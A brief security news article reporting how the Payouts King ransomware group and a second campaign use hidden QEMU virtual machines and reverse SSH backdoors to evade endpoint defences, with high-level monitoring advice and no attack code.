Data Security , Ransomware , Threat Intelligence Payouts King ransomware abuses QEMU for hidden VMs and backdoors April 20, 2026 Share By SC Staff The Payouts King ransomware operation is leveraging the QEMU emulator to create hidden virtual machines and establish reverse SSH backdoors on compromised systems, allowing them to bypass endpoint security measures. This technique enables attackers to run malicious payloads and store sensitive data undetected within the host environment, with further coverage provided by Bleeping Computer. Researchers have identified two distinct campaigns utilizing QEMU. The first, linked to the GOLD ENCOUNTER threat group and Payouts King ransomware, uses QEMU to run a hidden Alpine Linux VM as SYSTEM. This VM contains tools for credential harvesting and data exfiltration. Initial access in this campaign was achieved through exposed SonicWall VPNs and SolarWinds Web Help Desk vulnerabilities. The second campaign exploits the CitrixBleed 2 vulnerability to gain access, subsequently deploying a QEMU VM with manually installed tools for reconnaissance and data staging. Both campaigns demonstrate a sophisticated use of virtualization to evade detection and facilitate malicious activities. Organizations should implement robust monitoring for unauthorized QEMU instances, suspicious scheduled tasks, and unusual SSH activity. Source: Bleeping Computer An In-Depth Guide to Ransomware Get essential knowledge and practical strategies to protect your organization from ransomware attacks. Learn More SC Staff Related Security Operations Express website vulnerability exposed customer order details SC Staff April 20, 2026 The vulnerability allowed unauthorized access to order confirmation pages, revealing customer names, phone numbers, email addresses, postal and billing addresses, and details of purchased items. Security Operations Fiverr faces scrutiny over exposed user files SC Staff April 20, 2026 The data exposure occurred because Fiverr utilized Cloudinary for image and PDF storage, employing public URLs instead of secure, expiring links. Ransomware Over 337K affected by Cookeville Regional Medical Center hack SC Staff April 17, 2026 Tennessee-based Cookeville Regional Medical Center had information from 337,917 patients compromised following a ransomware attack last July that has been claimed by the Rhysida ransomware-as-a-service operation, according to Infosecurity Magazine. Related Events Cybercast Beyond the Hype: The Cybersecurity Trends CISOs are Keeping an Eye on in 2026 On-Demand Event Cybercast Beyond the data perimeter: Why next-generation DSPM is the foundation for modern data security On-Demand Event Virtual Conference Securing the Future of Finance: Strategies to Counter Modern Cyber Threats On-Demand Event Get daily email updates SC Media's daily must-read of the most current and pressing daily news Business Email By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy . Subscribe Related Terms Brute Force Checksum Covert Channels Cryptanalysis Cyclic Redundancy Check (CRC) Darknet Data Aggregation Data Warehousing Information Warfare Reconnaissance You can skip this ad in 5 seconds